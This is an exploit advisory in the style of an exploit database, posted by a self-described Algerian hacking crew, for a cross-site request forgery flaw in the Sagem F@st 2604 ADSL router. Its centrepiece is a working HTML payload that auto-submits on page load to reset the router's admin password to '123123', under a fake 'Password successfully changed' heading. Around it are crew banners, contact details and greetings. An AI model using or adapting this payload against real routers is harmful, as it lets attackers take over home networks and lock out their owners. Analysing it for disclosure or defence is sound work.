================================================================================
____ ______ ______ __ _______ ____
|__||||__||__||__||_/|__]|__||__/|||___ |___ ||||||| \_ |__]|||\
================================================================================##### Exploit Title: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router)# Author: KinG Of PiraTeS# Facebook Page: www.facebook.com/cr4ck3d# E-mail: t5r@hotmail.com # Category:: webapps# Google Dork: NA# Vendor: http://www.sagem.com/index.php# Version: 253180972B May be Other Version are Affected # Tested on: [Windows 7 Edition Intégrale]####### | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |# | * ------>KinG Of PiraTeS * The g0bl!n <-------- * | # | ------------------------------------------------- < |#### 1)Introduction
2)Vulnerability Description
3)Exploit
>>----------------------------------------------------------------1)Introduction
The Sagemcom F@st 2604is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports.2)Vulnerability Description
From SAGEM F@st 2604 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80
May be Other Version are Affected
3)Exploit
<html><body onload="javascript:document.forms[0].submit()"><H2>Password successfully changed [CSRF Exploit change ADMIN password]</H2><form method="POST" name="form0" action="http://192.168.1.254/password.cgi?sysPassword=123123"></form></body></html>-123123is the New Password
-####
Peace From Algeria
####=================================**Algerians Hackers**=======================================# Greets To :
Caddy-Dz & KedAns-Dz **All Algerians Hackers**, Kondamne , The-007,Bensekran , Joker dz
(exploit-id.com),(1337day.com),(h4ckforu.com),(alboraaq.com)
All My Friends: Ali Abdennadher ,Chaouki Keffois , Kader11000 , Br0x-dz , Hanixpo
!-Bb0yH4cK3r_Dz-! , xConsoLe , S@xx0R , kalashinkov3 ,..others
=============================================================================================